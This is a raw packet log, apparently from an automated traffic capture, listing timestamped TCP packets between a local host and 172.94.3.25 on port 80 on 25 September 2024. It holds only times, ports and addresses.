Sep 25, 2024 16:03:51.629271030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629287004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629302979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629306078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629323006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629336119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629352093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629364014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629364967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629375935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629388094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629394054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629400969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629410982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629415035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629426003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629431963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629440069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629477978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.635526896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635544062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635556936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635567904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635591984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635606050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635618925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635632992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635647058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635656118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.635687113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635698080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635709047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635719061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.635756969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.635899067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635962009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635979891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.635993958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.636001110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.636004925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.636033058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.636064053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.636075020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.636087894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.636095047 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.636121035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.713778019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713810921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713824987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713838100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713851929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713862896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.713877916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714015007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714162111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714174032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714186907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714214087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714241028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714242935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714260101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714274883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714287996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714299917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714327097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714361906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714461088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714472055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714484930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.714500904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.714529037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.724191904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.724355936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.724405050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.791754007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791774035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791785002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791796923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791903973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791915894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.791928053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792005062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792052984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792104006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792146921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792179108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792191029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792201996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792227983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792503119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792545080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792548895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792561054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792599916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.792640924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792654991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792668104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.792701960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.843053102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.869889975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869909048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869930029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869941950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869954109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869976997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869987965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.869999886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870011091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870024920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870126009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.870234013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870244980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870258093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870302916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.870390892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870403051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870414019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870426893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.870457888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.870501041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870512009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870523930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.870558977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948246002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948267937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948291063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948306084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948318005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948331118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948343992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948357105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948369026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948381901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948391914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948406935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948416948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948467016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948474884 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948529005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948622942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948632956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948645115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948667049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948698997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.948828936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948841095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948853016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.948875904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:52.958374023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.958388090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:52.958487034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.026726007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.026746988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.026760101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.026773930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.026854038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.026901007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.026910067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027025938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027039051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027055979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027064085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.027066946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027091980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.027117968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027131081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027154922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.027201891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027214050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027226925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027240992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.027261972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.027895927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027908087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027919054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.027967930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.036567926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.036580086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.036648035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.104876995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.104896069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.104908943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105053902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105074883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105086088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105098009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105109930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105129004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105210066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105221033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105232954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105261087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105283022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105304003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105315924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105339050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105349064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105364084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105370045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105376959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105397940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105426073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105458975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105484962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105494022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105525017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105525017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.105537891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.105566978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.115097046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.115112066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.115217924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183188915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183203936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183217049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183259964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183337927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183378935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183392048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183403969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183438063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183454990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183559895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183571100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183583021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183603048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183612108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183624029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183629990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183634996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183657885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183715105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183727026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183737993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183762074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183782101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183789015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.183793068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183818102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.183846951 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.193348885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.193365097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.193423986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.261415005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261434078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261445999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261459112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261514902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261527061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261542082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261553049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261565924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261694908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.261769056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261811972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.261814117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261825085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261845112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261857033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261859894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.261890888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.261949062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261960030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261971951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.261991978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.262041092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.262053967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.262064934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.262077093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.262105942 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.339874029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339891911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339912891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339934111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339946032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339956999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.339976072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340066910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340079069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340089083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.340090036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340102911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340120077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340197086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340207100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340261936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.340331078 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.340358019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340369940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340380907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340394020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.340435982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.340487003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.349826097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.349869013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.349916935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.417844057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417874098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417892933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417907000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417917967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417929888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417942047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.417994976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418077946 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418286085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418297052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418308973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418320894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418334007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418350935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418382883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418426037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418436050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418448925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418477058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418504000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418514967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418545008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418586969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418598890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418610096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.418632984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.418677092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.497436047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497452974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497464895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497477055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497499943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497510910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497523069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497534037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497545958 CEST	80	49715	172.94.3.25	192.168.2.6
